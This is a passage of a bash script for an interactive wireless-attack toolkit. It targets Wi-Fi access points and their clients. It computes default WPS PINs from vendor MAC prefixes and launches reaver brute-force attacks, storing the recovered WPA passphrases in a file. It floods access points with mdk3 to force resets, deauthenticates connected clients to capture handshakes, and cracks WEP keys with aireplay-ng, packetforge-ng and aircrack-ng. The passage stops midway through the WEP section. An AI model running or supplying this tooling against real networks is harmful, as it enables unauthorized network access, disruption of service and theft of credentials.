  2036. 74888B)
  2037. echo -e "several possible PINs, ranked in order>  
  2038.  43297917 73767053 88202907 16538061 16702738 18355604"
  2039. PIN4REAVER=43297917
  2040. ;;
  2041. DC0B1A)
  2042. echo -e "several possible PINs, ranked in order>  
  2043.  16538061 16702738 18355604 88202907 73767053 43297917"
  2044. PIN4REAVER=16538061
  2045. ;;
  2046. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
  2047. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
  2048. PIN4REAVER=$PINWPS1
  2049. ;;
  2050. 002275)
  2051. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2052. PIN4REAVER=$PINWPS1
  2053. ;;
  2054. 08863B)
  2055. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2056. PIN4REAVER=$PINWPS1
  2057. ;;
  2058. 001CDF)
  2059. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2060. PIN4REAVER=$PINWPS1
  2061. ;;
  2062. 00A026)
  2063. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2064. PIN4REAVER=$PINWPS1
  2065. ;;
  2066. 5057F0)
  2067. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2068. PIN4REAVER=$PINWPS1
  2069. ;;
  2070. C83A35 | 00B00C | 081075)
  2071. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2072. PIN4REAVER=$PINWPS1
  2073. ;;
  2074. E47CF9 | 801F02)
  2075. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2076. PIN4REAVER=$PINWPS1
  2077. ;;
  2078. 0022F7)
  2079. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2080. PIN4REAVER=$PINWPS1
  2081. ;;
  2082. *)
  2083. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
  2084. PIN4REAVER=$PINWPS1
  2085. ;;
  2086. esac
  2087. fi
  2088.  
  2089. ############## End Of WPSPIN-1.3 Default Pin Generater ##############
  2090.  
  2091. echo ""
  2092. echo $RED"MAC address for$STAND mon0:"$STAND
  2093. macchanger -s mon0
  2094. sleep 4
  2095.  
  2096. ############## End Of Review Information ##############
  2097.  
  2098. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
  2099. echo ""
  2100. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  2101.  
  2102. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  2103.    xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2104.    cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
  2105.    mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
  2106.    rm temp1.txt
  2107.    echo ""
  2108.    echo ""
  2109.    echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
  2110.    echo ""
  2111.    read -p $GREEN"Press [Enter] to continue.$STAND"
  2112.    fi
  2113.  
  2114. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
  2115.    echo ""
  2116.    fi
  2117. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
  2118.  
  2119. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
  2120.  
  2121. clear
  2122. echo $RED"Choose an attack option:"$STAND
  2123. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
  2124. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
  2125. echo
  2126. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
  2127. echo
  2128. case $yourch in
  2129.  
  2130. 1)
  2131. clear
  2132. echo $RED"Choose a pin:"
  2133. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
  2134. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
  2135. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
  2136. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
  2137. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
  2138.  
  2139. if [[ $PinOption == "1" ]]; then
  2140.    clear
  2141.    echo $RED"Reaver Attack Command:"$STAND
  2142.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
  2143.    echo ""
  2144.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2145.    clear
  2146.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2147.    rm reaver.txt
  2148.    echo ""
  2149.    fi
  2150.  
  2151. if [[ $PinOption == "2" ]]; then
  2152.    clear
  2153.    echo $RED"Reaver Attack Command:"$STAND
  2154.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
  2155.    echo ""
  2156.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2157.    clear
  2158.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2159.    rm reaver.txt
  2160.    echo ""
  2161.    fi
  2162.  
  2163. if [[ $PinOption == "3" ]]; then
  2164.    clear
  2165.    echo $RED"Reaver Attack Command:"$STAND
  2166.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
  2167.    echo ""
  2168.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2169.    clear
  2170.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2171.    rm reaver.txt
  2172.    echo ""
  2173.    fi
  2174.  
  2175. if [[ $PinOption == "4" ]]; then
  2176.    clear
  2177.    echo $RED"Reaver Attack Command:"$STAND
  2178.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
  2179.    echo ""
  2180.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2181.    clear
  2182.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2183.    rm reaver.txt
  2184.    echo ""
  2185.    fi ;;
  2186.  
  2187. 2)
  2188. clear
  2189. echo $RED"Current Reaver Attack Command:"$STAND
  2190. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  2191. echo ""
  2192. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
  2193. echo ""
  2194. echo $RED"New Reaver Attack Command:"$STAND
  2195. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  2196. echo ""
  2197. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2198. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2199. rm reaver.txt
  2200.  
  2201. ################## START OF: MDK3 ACCESS POINT RESET ############################################
  2202.  
  2203. echo ""
  2204. echo ""
  2205. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
  2206. read a
  2207. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
  2208.  
  2209.    echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
  2210.    kismet ncsource=mon0:hop=true
  2211.    sleep 5
  2212.  
  2213.    echo ""
  2214.    echo $RED"Target essid:$STAND $AP_essid"
  2215.    echo ""
  2216.    read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
  2217.    echo ""
  2218.    cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
  2219.  
  2220.    echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
  2221.    sleep 1
  2222.    echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
  2223.    sleep 1
  2224.    cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
  2225.    sleep 1
  2226.    cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
  2227.    sleep 1
  2228.    echo $AP_bssid > Blacklist.txt
  2229.  
  2230.    echo ""
  2231.    echo $GREEN"Does the access point support WAP+TKIP?"
  2232.    echo $GREEN"[1]$BLUE = Yes."
  2233.    echo $GREEN"[2]$BLUE = No."
  2234.    echo $GREEN"1 or 2?"$STAND
  2235.    read option
  2236.  
  2237.    if [[ $option == "1" ]]; then
  2238.  
  2239.       read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  2240.  
  2241.       if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  2242.          xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2243.          echo ""
  2244.          echo ""
  2245.       fi
  2246.  
  2247.       echo $GREEN"Did the access point have any clients connected to it?"
  2248.       echo $GREEN"[1]$BLUE = Yes."
  2249.       echo $GREEN"[2]$BLUE = No."
  2250.       echo $GREEN"1 or 2?"$STAND
  2251.       read MDK3_ClientChoice
  2252.  
  2253.       if [[ $MDK3_ClientChoice == "1" ]]; then
  2254.  
  2255.          echo '#!/bin/bash
  2256.  
  2257. RED=$(tput setaf 1 && tput bold)
  2258. GREEN=$(tput setaf 2 && tput bold)
  2259. STAND=$(tput sgr0)
  2260.  
  2261. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2262. sleep 1
  2263. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2264. echo ""
  2265. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2266.  
  2267.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2268.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2269.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2270.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
  2271.  
  2272. while :
  2273. do
  2274.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2275.    sleep 20
  2276.    kill `pidof airodump-ng`
  2277. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2278.  
  2279.       fi
  2280.  
  2281.       if [[ $MDK3_ClientChoice == "2" ]]; then
  2282.  
  2283.          echo '#!/bin/bash
  2284.  
  2285. RED=$(tput setaf 1 && tput bold)
  2286. GREEN=$(tput setaf 2 && tput bold)
  2287. STAND=$(tput sgr0)
  2288.  
  2289. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2290. sleep 1
  2291. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2292. echo ""
  2293. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2294.  
  2295.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2296.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2297.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2298.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
  2299.  
  2300. while :
  2301. do
  2302.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2303.    sleep 20
  2304.    kill `pidof airodump-ng`
  2305. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2306.  
  2307.       fi
  2308.       fi
  2309.  
  2310.    if [[ $option == "2" ]]; then
  2311.  
  2312.    echo '#!/bin/bash
  2313.  
  2314. RED=$(tput setaf 1 && tput bold)
  2315. GREEN=$(tput setaf 2 && tput bold)
  2316. STAND=$(tput sgr0)
  2317.  
  2318. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2319. sleep 1
  2320. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2321. echo ""
  2322. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2323.  
  2324.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2325.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2326.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2327.  
  2328. while :
  2329. do
  2330.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2331.    sleep 20
  2332.    kill `pidof airodump-ng`
  2333. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2334.  
  2335.    fi
  2336.  
  2337.    sleep 1
  2338.    chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2339.    sleep 1
  2340.    Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
  2341.    rm $HOME/scrypta/temp/Blacklist.txt
  2342.  
  2343. if [[ $a == "N" || $a == "n" ]]; then
  2344.    echo ""
  2345. fi
  2346. fi
  2347. ################## END OF: MDK3 ACCESS POINT RESET ############################################
  2348.  
  2349. echo "" ;;
  2350. 0) exit 0;;
  2351. *) echo "";
  2352. echo "Press [Enter] to continue. . ." ; read ;;
  2353. esac
  2354.  
  2355. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
  2356.  
  2357. ######################## LOOP ############################################
  2358.  
  2359. clear
  2360. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
  2361. y $BLUE= Choose another target.$GREEN
  2362. n $BLUE= Return to main menu.$GREEN
  2363. Please choose y/n?$STAND: " CONFIRM
  2364. case $CONFIRM in
  2365. n|N|NO|no|No)
  2366. break ;;
  2367. *) echo "" ;;
  2368. esac
  2369. done
  2370.  
  2371. ############## End Of Loop Section ##############
  2372.  
  2373. ############## Start Of Cleanup ##############
  2374.  
  2375. rm *.txt
  2376. rm *.py
  2377. cd
  2378. ############## End Of Cleanup ##############
  2379. ;;
  2380.  
  2381. ###### [4] Capture WPA/WPA2 Handshake ######
  2382. 4)
  2383. cd $HOME/scrypta/temp
  2384. clear
  2385. echo $RED"Scan for possible targets."
  2386. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
  2387. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  2388.  
  2389. xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
  2390.  
  2391. tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length:  0>/d' > temp0.txt
  2392. cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1  -s ':  ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
  2393. sleep 1
  2394.  
  2395. PresentedAPs=$(cat PresentedAPs.txt)
  2396. sleep 1
  2397. echo ""
  2398. echo "Please choose an AP"
  2399. echo ""
  2400. echo "$PresentedAPs"
  2401. echo ""
  2402. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  2403. echo ""
  2404.  
  2405. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  2406. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2407. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2408. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2409.  
  2410. clear
  2411. echo $RED"Chosen Target Details."$STAND
  2412. echo $RED"Aceess Point essid$STAND: $AP_essid"
  2413. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  2414. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  2415.  
  2416. echo ""
  2417. echo $RED"Scan for clients connected to$STAND $AP_essid"
  2418. echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
  2419. read -p $GREEN"Press [Enter] to start the scan."$STAND
  2420.  
  2421. xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2422.  
  2423. while true
  2424. do
  2425.  
  2426. tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
  2427. cat temp1.txt | nl -ba -w 1  -s ': ' > ConnectedClientsScan.txt
  2428. ConnectedClientsScan=$(cat ConnectedClientsScan.txt)
  2429.  
  2430. sleep 2
  2431. echo ""
  2432. echo $RED"Please choose a client MAC address"$STAND
  2433. echo ""
  2434. echo "$ConnectedClientsScan"
  2435. echo ""
  2436. read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
  2437. echo ""
  2438.  
  2439. sleep 1
  2440. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  2441. echo ""
  2442. echo $RED"Chosen Client MAC Address."$STAND
  2443. echo "$Chosen_Client_MAC"
  2444. echo ""
  2445.  
  2446. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &
  2447.  
  2448. echo $RED"Choose an option:"
  2449. echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
  2450. echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
  2451. echo $GREEN"[3]$BLUE = Choose another client."
  2452. echo $GREEN"1, 2, or 3?"$STAND
  2453. read option
  2454.  
  2455. if [[ $option == "1" ]]; then
  2456.        echo "De-Authenticate a single client."
  2457.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
  2458.        fi
  2459. if [[ $option == "2" ]]; then
  2460.        echo "De-Authenticate all connected clients."
  2461.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
  2462.        fi
  2463. if [[ $option == "3" ]]; then
  2464.        clear
  2465. echo "Please choose a client"
  2466.        echo ""
  2467.        echo "$ConnectedClientsScan"
  2468.        echo ""
  2469.        read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
  2470.        echo ""
  2471.        Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  2472.        echo ""
  2473.        echo "Chosen Target Details."
  2474.        echo "$Chosen_Client_MAC"
  2475.        sleep 4
  2476.        fi
  2477.  
  2478. clear
  2479. echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
  2480. read -e CONFIRM
  2481. case $CONFIRM in
  2482. n|N|NO|no|No)
  2483. break ;;
  2484. *) echo "" ;;
  2485. esac
  2486. done
  2487.  
  2488. rm WPA_Scan.txt
  2489. rm temp0.txt
  2490. rm PresentedAPs.txt
  2491.  
  2492. rm WPA_ClientScan.txt
  2493. rm temp1.txt
  2494. rm ConnectedClientsScan.txt
  2495.  
  2496. kill `pidof airodump-ng`
  2497. rm *.csv
  2498. rm *.netxml
  2499. mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
  2500. cd
  2501. ;;
  2502.  
  2503. ###### [5] WEP Attacks ######
  2504. 5)
  2505. cd $HOME/scrypta/temp
  2506. clear
  2507. echo $RED"Scan for possible targets."$STAND
  2508. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
  2509. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  2510.  
  2511. xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0
  2512.  
  2513. sleep 1
  2514. tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length:  0>/d' > temp0.txt
  2515. sleep 1
  2516. PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//' )
  2517.  
  2518. clear
  2519. echo $RED"Please choose a target"$STAND
  2520. echo ""
  2521. echo "$PresentedAPs"
  2522. echo ""
  2523. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  2524. echo ""
  2525.  
  2526. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  2527. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2528. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2529. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2530.  
  2531. clear
  2532. echo $RED"Chosen Target Details."$STAND
  2533. echo $RED"Aceess Point essid$STAND: $AP_essid"
  2534. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  2535. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  2536. echo ""
  2537. echo $RED"Scan for clients connected to$STAND $AP_essid."
  2538. echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
  2539. read -p $GREEN"Press [Enter] to start the scan."$STAND
  2540.  
  2541. sleep 1
  2542. xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0
  2543.  
  2544. echo ""
  2545. echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
  2546. read answer
  2547.  
  2548. if [[ $answer == "y" || $answer == "Y" ]]; then
  2549.  
  2550.        tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
  2551.        sleep 2
  2552.        PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//')
  2553.        
  2554.        sleep 2
  2555.        clear
  2556.        echo "Please choose a client"
  2557.        echo ""
  2558.        echo "$PresentedClients"
  2559.        echo ""
  2560.        
  2561.        read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
  2562.        echo ""
  2563.  
  2564.        Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
  2565.        ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  2566.  
  2567.        echo $RED"You've chosen:"
  2568.        echo $RED"Client$STAND: $ClientMAC"
  2569.        echo ""
  2570.        
  2571.        while true
  2572.        do
  2573.  
  2574.        read -p $GREEN"Press [Enter] to start the attack.$STAND"
  2575.        xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
  2576.        xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  2577.        xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  2578.        echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
  2579.        echo "Please wait for aircrack to start...$STAND"
  2580.        sleep 60
  2581.        aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
  2582.        sleep 2
  2583.        passkey=$(cat WEPpasskey.txt)
  2584.        sleep 2
  2585.        kill `pidof xterm`
  2586.        echo ""
  2587.        echo $RED"Target essid$STAND: $AP_essid"
  2588.        echo $RED"Target bssid$STAND: $AP_bssid"
  2589.        echo $RED"Target Pass-Key$STAND: $passkey"
  2590.  
  2591.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  2592.        read -e CONFIRM
  2593.        case $CONFIRM in
  2594.        y|Y|YES|yes|Yes)
  2595.        break ;;
  2596.        *) echo $RED"Please re-enter information$STAND" ;;
  2597.        esac
  2598.        done
  2599.  
  2600.        echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2601.        echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2602.        echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2603.        echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  2604.        cd
  2605.        fi
  2606. if [[ $answer == "n" || $answer == "N" ]]; then
  2607.        while true
  2608.        do
  2609.  
  2610.        echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
  2611.        xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
  2612.        sleep 2
  2613.        aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
  2614.        sleep 2
  2615.        aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
  2616.        sleep 2
  2617.        packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
  2618.        sleep 2
  2619.        xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
  2620.        sleep 2
  2621.  
  2622.        echo ""
  2623.        echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
  2624.        read option
  2625.        
  2626.        if [[ $option == "y" ]]; then
  2627.               aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
  2628.               passkey=$(cat WEPpasskey.txt)
  2629.               rm WEPpasskey.txt
  2630.               kill ${AIRODUMPPID}
  2631.               kill ${AIREPLAYPID}
  2632.               rm *.ivs
  2633.               rm *.cap
  2634.               rm *.xor
